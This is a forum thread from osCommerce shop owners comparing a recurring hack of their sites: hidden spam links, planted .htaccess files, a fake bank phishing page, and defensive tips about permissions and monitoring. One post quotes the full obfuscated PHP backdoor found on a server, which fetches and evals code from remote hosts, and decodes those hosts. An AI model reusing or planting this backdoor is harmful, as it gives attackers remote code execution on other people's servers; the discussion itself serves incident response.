Hacker attacks

[dandelion]

Does anyone know how to stop the repeated hacker attacks we are getting. I've had several osC sites attacked recently- one site repeatedly.

 

This is added to the bottom of index.php with tons of links....

 

<!--dd4--><font style="position: absolute;overflow: hidden;height: 0;width: 0">links to porn and other stufff have been removed from code here XGHSLJJ2103@katok_05.05</font></body></html><!--dd5-->

 

They also upload an index file into the the images folder and images.

 

Sometimes they just upload a index.html file to the root so that the site shows their file instead of the index.php file.

 

How are they doing this?

[America-Warehouse.com]

Does anyone know how to stop the repeated hacker attacks we are getting. I've had several osC sites attacked recently- one site repeatedly.

 

This is added to the bottom of index.php with tons of links....

 

<!--dd4--><font style="position: absolute;overflow: hidden;height: 0;width: 0">links to porn and other stufff have been removed from code here XGHSLJJ2103@katok_05.05</font></body></html><!--dd5-->

 

They also upload an index file into the the images folder and images.

 

Sometimes they just upload a index.html file to the root so that the site shows their file instead of the index.php file.

 

How are they doing this?

 

 

oh jesus.. hope this solved for all of us!

 

I'll keep eyes on this 1

 

Thanks for the head up

 

America-Warehouse.com

[arietis]

Does anyone know how to stop the repeated hacker attacks we are getting. I've had several osC sites attacked recently- one site repeatedly.

 

This is added to the bottom of index.php with tons of links....

 

<!--dd4--><font style="position: absolute;overflow: hidden;height: 0;width: 0">links to porn and other stufff have been removed from code here XGHSLJJ2103@katok_05.05</font></body></html><!--dd5-->

 

They also upload an index file into the the images folder and images.

 

Sometimes they just upload a index.html file to the root so that the site shows their file instead of the index.php file.

 

How are they doing this?

 

who are you hosting with? have you talked to them? there may be a problem with their configuration that allows other customers to access your area of a shared server. you might also take a look at your server logs, as this may be able to tell you where the attacks are coming from and what exactly they are doing.

 

in the mean time, i'd change all of your passwords and take a careful look at everything on your site. if it's happening repeatedly, even after changing passwords, either they've somehow installed a backdoor application to give them access or your host needs to change their security policies. you might also consider removing the admin/file_manager.php as this could be used to access the site remotely.

 

there's a contribution called 'site monitor' i think that could be used to alert you of changes like this as well. that might help you in narrowing down the time frame to look in the server logs when it happens again.

 

and finally, i'd find out who the porn site is being hosted by and contact them as well. it's obvious who is doing it and that hosting company may be convinced to send them a warning that if they continue their account can be canceled. this may not work but it's worth a try. they could, after all, be named in any legal action you may want to bring against the perpetrators. (although winning a lawsuit would be an uphill battle, the threat of one is sometimes enough)

 

good luck!

[blueflametuna]

Me too! Discovered that .htaccess files had been created in several places:

 

/catalog/images

/catalog/images/icons

/catalog/images/infobox

 

Each contained something similar to this:

 

Options -MultiViews

ErrorDocument 404 //catalog/images/136008.php

 

Permissions had been changed on many files.

Some images are now 0 bytes in length.

 

But it gets worse...

 

I checked my web log files and found several search engines trying repeatedly to access files such as:

 

61.135.162.212 - - [06/May/2008:19:26:45 -0500] "GET /tmp269/index.php?pg=amateur-british-nude.htm HTTP/1.1" 404 1544 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

74.6.19.90 - - [06/May/2008:19:27:17 -0500] "GET /tmp269/index.php?pg=amateur-boxing-matches.htm HTTP/1.0" 404 1544 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

64.124.85.72 - - [06/May/2008:21:49:13 -0500] "GET /tmp269/index.php?pg=amateur-british-couples.htm HTTP/1.1" 404 1544 "-" "Mozilla/5.0 (compatible; BecomeBot/3.0; +http://www.become.com/site_owners.html)"

209.234.171.37 - - [07/May/2008:01:49:35 -0500] "GET /tmp269/index.php?pg=amateur-breast-galleries.htm HTTP/1.0" 404 1544 "-" "ia_archiver"

202.141.117.91 - - [07/May/2008:02:09:29 -0500] "GET /catalog/images/banners/coreeditor+crack.html HTTP/1.0" 403 1228 "http://www.google.co.in/search?hl=en&q=free+downloding+pdf+to+word&btnG=Google+Search&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

66.249.65.226 - - [08/May/2008:03:31:07 -0500] "GET /tmp269/index.php?pg=amateur-bra-pictures.htm HTTP/1.1" 404 1544 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

 

(The list is mind numbing...) But I digress.

 

I also found referrers from other sites:

 

64.27.5.162 - - [08/May/2008:10:23:53 -0500] "HEAD /tmp269/index.php?pg=amateur-brat-porn.htm HTTP/1.1" 404 0 "http://www.blackoakbooks.com/" "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;)"

 

So, I went to www.blackoakbooks.com and viewed the source for their home page:

 

Sure enough, there it was:

 

<!--dd4--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href='http://ppphotography.com.au/tmp297/amateur-radio-hustory.htm' title='amateur radio hustory'>amateur radio hustory</a> <a href='http://school.stjosephbristol.org/tmp494/angel-teen-forum.htm' title='angel teen forum'>angel teen forum</a> <a href='http://wholerestmusic.com/tmp450/asian-bank-philadelphia.htm' title='asian bank philadelphia'>asian bank philadelphia</a> <a href='http://gamesandlottos.com/tmp411/teen-cumming-panties.htm' title='teen cumming panties'>teen cumming panties</a> <a href='http://clips.prrag.com/tmp381/gay-teens-leather.htm' title='gay teens leather'>gay teens leather</a> <a href='http://midnight.thegeekosphere.com/tmp14/gay-porn-blowjob.htm' title='gay porn blowjob'>gay porn blowjob</a> <a href='http://zmilliondollars.com/tmp446/hdroxycut-hardcore-reviews.htm' title='hdroxycut hardcore reviews'>hdroxycut hardcore reviews</a> <a href='http://casinogamblersguide.com/tmp290/gay-sex-gallery.htm' title='gay sex gallery'>gay sex gallery</a> <a href='http://egyptiancastle.com/tmp163/pussys-up-close.htm' title='pussys up close'>pussys up close</a> <a href='http://hotoilstocks.com/tmp255/amateur-eva-shine.htm' title='amateur eva shine'>amateur eva shine</a> <a href='http://tangledupinblues.com/tmp285/latest-teen-fashion.htm' title='latest teen fashion'>latest teen fashion</a> <a href='http://cybersteps.org/tmp300/asian-ass-clips.htm' title='asian ass clips'>asian ass clips</a> <a href='http://rachel.swenton.com/tmp2/female-sucking-pussy.htm' title='female sucking pussy'>female sucking pussy</a> <a href='http://innatedetroit.com/tmp346/pics-of-pussy.htm' title='pics of pussy'>pics of pussy</a> <a href='http://pinoy-blog.isoftinno.com/tmp206/penis-into-pussy.htm' title='penis into pussy'>penis into pussy</a> <a href='http://perk.no/tmp455/midnight-pussy-208.htm' title='midnight pussy 208'>midnight pussy 208</a> <a href='http://labarca.org/tmp253/asian-mix-uk.htm' title='asian mix uk'>asian mix uk</a> <a href='http://oceanohana.com/tmp445/gay-photo-story.htm' title='gay photo story'>gay photo story</a>

 

(OK, you get the idea. Litterally hundreds of entries, including links to my web site.)

 

The telltale signature at the end of the file:

 

<a href='http://cluboholics.com/tmp166/asian-porn-thumbnails.htm' title='asian porn thumbnails'>asian porn thumbnails</a> XGHSLJJ2103@katok_05.05</font></body></html><!--dd5-->

 

= = = = = = = = =

 

I have since alerted the webmasters of several of these sites to let them know that they have been hacked.

I have also removed the offending content from my web site.

 

But I do not want to have to do full directory tree searches manually on a daily basis to determine if it has happened again.

 

In the TMI Department, this coincided with another attack that was what first brought it to my attention.

My web hosting company sent me an email stating that I had phishing content on my site.

 

An entire directory structure had been mysteriously inserted into my web site:

 

/catalog/images/infobox/corner_right/Thumb/imexplorer/Static-SelfDirected/execute/wealthmanagement/

 

Underneath it was a Wells Fargo page, complete with logos, ads, etc., and a username and password login screen.

 

I have removed this also, but someone is interested in it (about 10 minute intervals):

 

66.16.13.14 - - [04/May/2008:19:05:13 -0500] "GET /catalog/images/infobox/corner_right/Thumb/imexplorer/Static-SelfDirected/execute/wealthmanagement/index.htm HTTP/1.1" 404 - "-" "libwww-perl/5.803"

 

Sorry this was so long, but I feel that it is important enough to be verbose.

 

Anyone have any ideas what the vulnerability is here?

How are they getting in? It appears to be scripted, so it may have a wide distribution base.

[arietis]

Me too! Discovered that .htaccess files had been created in several places:

 

wow. it's fascinating how much work they go through. thanks for all the detail, it's very interesting to me.

 

i have the same question for you as the other poster: who are you hosting with? have you contacted them and told them about this? they should be able to look at server logs to determine when and how this happened. ultimately, it's your responsibility to ensure security on your site, but they should be able to help you in figuring out where you are vulnerable (and they may have more experience in this area than you do). look through your server logs and see what they can tell you. the time stamps of the files added to your site should give you an idea of what time frame to look in your logs.

 

if i were you, i'd do the following:

- change all passwords...to your control panel, database, ftp, everything.

- remove the admin/file_manager.php file. this could give them a back door and you really don't need it anyway.

- double check the permissions on all directories. make sure they are not public writable.

 

there is a site monitor contribution, http://addons.oscommerce.com/info/4441 which might give you a heads up in the future if this happens again and give you an idea of what they have done.

 

and if you do find out anything from your host about this, please report back. i know that i'd love to hear more about how this could be done so that i can protect my own site and those of my clients.

 

best of luck to you.

[germ]

Anyone have any ideas what the vulnerability is here?
How are they getting in? It appears to be scripted, so it may have a wide distribution base.

This happened to me back in March.

 

My educated guess is it was because the images folder was at "777" permissions (My bad!! :blush: ).

 

I've since lowered it to "755" and (fingers crossed) no more hack.

 

After I changed it to "755" I remembered why it was that way.

 

If I have it at "755", osC Admin couldn't write to the images folder.

 

Long story short, I installed a contribution called osC FileBrowser. The guy I set the site up for uses Frontpage to upload images, then the Admin uses the contrib. to find them in the images folder.

 

You might check your /admin/backups folder. They planted something there on our site...

:blush:

[dandelion]

Oh I should have said that I now set my index.php file permissions to 444 when I'm not working on the site - this prevents the hidden text problem.

 

All permissions are set as they should be according to osCommerce Knowledge Base

[dandelion]

Anyone have any ideas what the vulnerability is here?
How are they getting in? It appears to be scripted, so it may have a wide distribution base.

This happened to me back in March.

 

My educated guess is it was because the images folder was at "777" permissions (My bad!! :blush: ).

 

I've since lowered it to "755" and (fingers crossed) no more hack.

 

After I changed it to "755" I remembered why it was that way.

 

If I have it at "755", osC Admin couldn't write to the images folder.

 

Long story short, I installed a contribution called osC FileBrowser. The guy I set the site up for uses Frontpage to upload images, then the Admin uses the contrib. to find them in the images folder.

 

You might check your /admin/backups folder. They planted something there on our site...

:blush:

 

 

THANKS! yes there is a new file in backups .... 209639.php - WHY do people waste their life energy in such a negative way? I just don't get it!

[blueflametuna]

Yup. /admin/backups was 777. (didn't use to be.)

 

Found these:

/admin/backups/.htaccess

 

Options -MultiViews

ErrorDocument 404 //admin/backups/14740.php

 

Options -MultiViews

ErrorDocument 404 //admin/backups/90032.php

 

 

14740.php

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] :

$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

 

1

 

 

 

Did a little research...

 

A quick trip to an online base64 decoder...

 

aHR0cDovLw== http://

d3d3My5yc3NuZXdzLndz www3.rssnews.ws

d3d3My54bWxkYXRhLmluZm8= www3.xmldata.info

aHR0cDovLzcucnNzbmV3cy53cy8/ http://7.rssnews.ws/?

 

Googled that...

 

Seems to have been around a while:

 

References go all the way back to March, 2007...

(Mar. 2007) http://www.pivotlog.net/forum/viewtopic.ph...66a8e397ec9a4e1

(Aug. 2007) http://codyprecord.com/?q=en/node/22

(Sep. 2007) http://www.chargertek.com/smf/viewtopic.php?f=36&t=1621

(Oct. 2007) http://www.webhostingtalk.com/showthread.php?t=642227

 

To make a short story long, they find a world writable directory, and plop in these files.

By utilizing the .htaccess file, and referring to a php file instead of a 404 htm,

all they have to do now is try to access a file in that directory that doesn't exist. easy.

Php script runs, which can do anything now, because it is being run by your own php server, as you.

 

Look for files in your main domain folder, such as /tmp456

 

I had several of these, which included:

 

index.php

keysr.txt

keyst.txt

nickr.txt

page.tpl

w1.txt

w2.txt

w3.txt

w4.txt

 

If you are interested in their contents, I can forward them to you.

Just let me say that all roads lead to porno, and a site in Russia.

 

Now I am left with trying to clean up the mess left behind...

Broken links, missing files, modified file/directory attributes,

not to mention hundreds (thousands?) of links to non-existent pages on my site,

scattered about the Net, and being referenced by all the major search engines... sheesh.

 

Check your logs. Double check your file permissions. Look for foreign content.

And one other thing I might have to do, find a web hosting provider that doesn't share servers.

[blueflametuna]

OK, this is getting ridiculous. I've rechecked my permissions, and changed my passwords.

 

Someone is still getting in, presumably from a vulnerability within osCommerce code.

Now, granted, I am on an older version, I believe.

I am not getting any support from my hosting service. That can be fixed...

 

Is there any place I can go to check which version I have, what versions are available,

and what known vulnerabilities have been addressed specifically?

 

Even with permissions on the directory of 547, someone was able to overwrite my .htaccess file.

 

Anyone ever heard of mikandamp.org ? (Some spammer outfit in China...?)

[user99999999]

I think your problems are non osc related. If you search google for XGHSLJJ2103 you will find many non osc sites have been hacked with the sames thing <!--dd4-->.........XGHSLJJ2103

 

 

If you have old version 2.1 or upgraded from 2.1 then check for include_once.php

 

http://www.oscommerce.com/about/news,72

[dandelion]

I think your problems are non osc related. If you search google for XGHSLJJ2103 you will find many non osc sites have been hacked with the sames thing <!--dd4-->.........XGHSLJJ2103

 

 

If you have old version 2.1 or upgraded from 2.1 then check for include_once.php

 

http://www.oscommerce.com/about/news,72

 

Thanks but this site is on 2.2 and does not have an include_once.php

[mshisha]

I am just checking my website out for problems - this is an example of what I see on the "who's online" page in admin

 

Quote

 

/product_info.php?products_id=http://amygirl.chat.ru/images/imag

 

Unquote

 

I am now just going to check out all the pages mentioned here

Does anyone have any ideas of where I might look otherwise?

 

Thanks

[dandelion]

I am just checking my website out for problems - this is an example of what I see on the "who's online" page in admin

 

Quote

 

/product_info.php?products_id=http://amygirl.chat.ru/images/imag

 

Unquote

 

I am now just going to check out all the pages mentioned here

Does anyone have any ideas of where I might look otherwise?

 

Thanks

 

Look for hidden text at the end of your index.php file and look in your images folder for an index.html file. Also look in your backups folder in admin. They got in again last night ... sigh

[mshisha]

Look for hidden text at the end of your index.php file and look in your images folder for an index.html file. Also look in your backups folder in admin. They got in again last night ... sigh

 

Sorry for you .... this is a pain - and big worry ...

 

I can't find any text on the index.php file which is out of place (using Beyond Campare2 )

I have changed admin password/ cp password - so not sure what else to do

 

Is it likely the webhoster is not secure enough? Who do you host with?

[dandelion]

Sorry for you .... this is a pain - and big worry ...

 

I can't find any text on the index.php file which is out of place (using Beyond Campare2 )

I have changed admin password/ cp password - so not sure what else to do

 

Is it likely the webhoster is not secure enough? Who do you host with?

 

If there is hidden text you just need to view source and go to the bottom of the page and you'll see it.

 

No this isn't a host problem... The site is with Host Excellence. Here are their comments

 

Thank you for contacting our technical support team!

 

Please note that most of hackers' attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS, any other php-based applications). We cannot keep them secured as we are not the developers of such kind of software.

From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. It is strongly recommended to review everything that you have in website folder and check webserver logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes. Our advise is to contact a qualified webmaster for remedying this problem, since customization and fixing third-party software falls out of our support boundaries unfortunately.

So, It is strongly recommended to review everything that you have in website folder and try to determine the way you may protect your applications. For example, If you have any widely-used software installed (forum, blog, etc.etc.), check the vendor site for recent updates or security fixes.

 

Please also note that your files are located on the Linux-based server and you are able to change file/folder permissions so make sure you do not have any "open" files/folders with write permissions set for all.

So please check if any folders has full granted permissions 777 set, which is means that it's worldwriteable for anyone from the Web. Recommended permissions are 755 or 644.

 

I also recommend you to change your current FTP password through the Control Panel (Manage -> FTP manager -> Password icon). Some widespread trojans have a functions to steal FTP passwords from user`s local PC`s and send these passwords to hackers (or special bots which were made by hackers). So you need to scan your local PC for viruses (using in-depth scanning) and change your current FTP password.

 

Please feel free to contact us if you need further assistance, we are available 24/7.

[♥FWR Media]

If there is hidden text you just need to view source and go to the bottom of the page and you'll see it.

 

No this isn't a host problem... The site is with Host Excellence. Here are their comments

 

Doesn't mean it's not a host issue at all .. they are just pointing the finger at software.

[spooks]

Has any of you tried this contrib to ensure attack does`nt get it via the $_GET as has happened in the past.

 

http://addons.oscommerce.com/info/5752

 

You can also use this to check on changes.

 

http://addons.oscommerce.com/info/4441

 

Cheers :)

[mshisha]

Has any of you tried this contrib to ensure attack does`nt get it via the $_GET as has happened in the past.

 

http://addons.oscommerce.com/info/5752

 

You can also use this to check on changes.

 

http://addons.oscommerce.com/info/4441

 

Cheers :)

 

I have been trying to install site monitor but keep getting errors (see forum topic)

as below

Warning: opendir(/hsphere/local/home/...../.......com/....../backups): failed to open dir: Permission denied in /hsphere/local/home/..../...../..../includes/functions/sitemonitor_functions.php on line 93

 

Warning: readdir(): supplied argument is not a valid Directory resource in /hsphere/local/home/......../........../......./includes/functions/sitemonitor_functions.php on line 95

 

Warning: opendir(/hsphere/local/home/......../........com/....): failed to open dir: Permission denied in /hsphere/local/home/......../..........com/.../includes/functions/sitemonitor_functions.php on line 93

 

Warning: readdir(): supplied argument is not a valid Directory resource in /hsphere/local/home/......./........../......../includes/functions/sitemonitor_functions.php on line 95

 

Warning: fopen(sitemonitor_reference.php): failed to open stream: Permission denied in /hsphere/local/home/......./........./........./includes/functions/sitemonitor_functions.php on line 208

Failed to open file sitemonitor_reference.php

 

obviously edited out user/site/adminfile etc

[dandelion]

Just found a bunch more files added last night in my thumbnails folder... missed earlier today - I'll have to check everywhere again - an index.php file and a htaccess files - image is http://oktaymatrax.sitemynet.com/asa/hack1.jpg

[spooks]

Looks like its trying to access the backup directory in admin, have you created it?

 

Also check path to it in configure.php

 

;)

[dandelion]

Okay so now another one of my osCommerce sites was hacked. They just uploaded an index.html file to the root. Replacing site with "Hacked By Ghost 61". I just had to delete the index.html and my index.php file showed the site again. How are they getting in and how can I stop them! My clients are getting really upset!

[ronlg]

I would wipe out the server completely.

 

If it's shared hosting, I would just delete everything in the directory... then upload a "clean" version of my clients site.

 

If the hacks continue, contact your hosting provider and request that they look into the issue. If they have a forum on their website, post about your issue and see if anyone else is having the same problem; with or without osCommerce.

 

A hosting company that I use with some of my sites had this issue come up. I caught it because I was going through the logs when I took over the servers. So I called up the hosting company and the guy played dumb until I asked him to look into it further. He came back, "Oh yeah, we had a security breach in November" (mind you it was January). I asked, "Why didn't we get notified of the breach... not a single email or phone call!" Crazy enough, the guy said, "Oh no! This isn't something you want to let everyone know!" I nearly jumped through the phone.

 

Hope you get it all sorted out!

[dandelion]

Just found another folder was added May 21 to the root named tmp with some numbers. The same site is a constant target. Some of my other sites have been targeted but then left alone when I clean them up.

[blueflametuna]

Check the folder permissions right away to see if they have been changed.

Also, try to obtain the log files from the webhosting service for FTP as well as the server itself.

They are either sniffing your FTP password, or the CP (control panel).

Otherwise, it is a server hack, and they have serious security issues.

 

My hosting company keeps trying to blame holes in my code (PHP), or the application.

It could be forms processing, such as input fields, but I doubt that.

 

I have seen this same hack outside of osCommerce sites.

 

The sick part is that the garbage this particular hack adds to other sites gets indexed by all of the major search engines,

and they keep trying to access these pages. Once you remove the /tmp/###### garbage, all they get is 404 errors.

But it is annoying that they keep trying. Check your log files as well. The attempted references are nausiating.